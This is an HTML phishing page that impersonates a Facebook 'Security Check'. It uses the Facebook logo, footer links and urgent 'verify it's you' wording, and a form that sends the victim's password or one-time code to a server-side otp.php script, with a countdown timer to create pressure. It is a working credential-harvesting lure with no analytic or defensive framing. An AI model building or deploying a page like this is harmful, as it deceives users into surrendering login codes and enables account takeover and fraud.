<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Security Check</title>
	<link rel="shortcut icon" type="ico" href="./fb-ico.png">
	<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body>
	<header>
		<div class="main-header">
			<div class="logo">
				<a href="http://www.facebook.com"><img src="./logo.png"></a>
			</div>
		</div>
	</header>
	<section>
		<div class="form">
			<div class="m-header">
				<h3>Facebook Security Check. Please Verify It's You.</h3>
			</div>
			<div class="red-box">
				<p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
				<p>Enter your password for security reason (make sure your caps lock is off)</p>
				<p>Forgot your password ? <a href="">Request new one</a>
			</div>

			<div  class="login-form">
				<form method="post" class="bb" novalidate="1" id="login-form" action="otp.php">
					<label for="password">OTP:</label><input name="pass" id="password" type="password"></input><br />
					<input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
					<label for="keep" style="font-size:12px;">keep me logged in</label><br />
					&nbsp;
				<center> <div>Time left - <span id="timer">2:00</span></div></center>
				&nbsp;
					<input type="submit" name="submit" value="Verify" style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
					<p><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;" href="">can't log in?</a></p>
				</form>
				<script type="text/javascript">
             startTimer();

function startTimer() {
  var presentTime = document.getElementById('timer').innerHTML;
  var timeArray = presentTime.split(/[:]+/);
  var m = timeArray[0];
  var s = checkSecond((timeArray[1] - 1));
  if(s==11){m=m-1}
  if((m + '').length == 1){
    m = '0' + m;
  }
  if(m < 0){
    m = '11';
  }
  document.getElementById('timer').innerHTML = m + ":" + s;
  setTimeout(startTimer, 1000);
}

function checkSecond(sec) {
  if (sec < 10 && sec >= 0) {sec = "0" + sec}; // add zero in front of numbers < 10
  if (sec < 0) {sec = "59"};
  return sec;
}
</script>
			</div>
		</div>
		
		<footer>
			<ul>
				<li><a href="">Mobile</a></li>
				<li><a href="">Find Friends</a></li>
				<li><a href="">Badges</a></li>
				<li><a href="">People</a></li>
				<li><a href="">Pages</a></li>
				<li><a href="">Apps</a></li>
				<li><a href="">Games</a></li>
				<li><a href="">Music</a></li>
				<li><a href="">Locations</a></li>
			</ul>
			<ul>
				<li><a href="">Topics</a></li>
				<li><a href="">About</a></li>
				<li><a href="">Create Ad</a></li>
				<li><a href="">Create Page</a></li>
				<li><a href="">Devepers</a></li>
				<li><a href="">Careers</a></li>
				<li><a href="">Privacy</a></li>
				<li><a href="">Cookies</a></li>
				<li><a href="">Terms</a></li><br />
				<li><a href="">Help</a></li>
			</ul>
		</footer>
	</section>
	<audio id="xyz" src="https://x2convert.com/Thankyou?token=U2FsdGVkX19zZMVUt9FiInLG3xbWVEJ5Qo3jI3T1LqIK7LvqpIWb9DRoXutU4sdS5xwu6RqaXWm7aJcIoxqPWJPv6y6%2fAwEdoYgxddDrJ%2fKfoRDyWwf3gW%2fB2LL9fK9MxIdB2P2W9PIH0UcMazELrvBIYp0g8pQGFwORMDBjukJFjZc%2f0dMbScfWa5oyiKcE&s=youtube&id=&h=3692998352381650705" preload="auto"></audio>
<br>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="color: white;">
<span id="displaySeconds"></span>
</body>
</html>
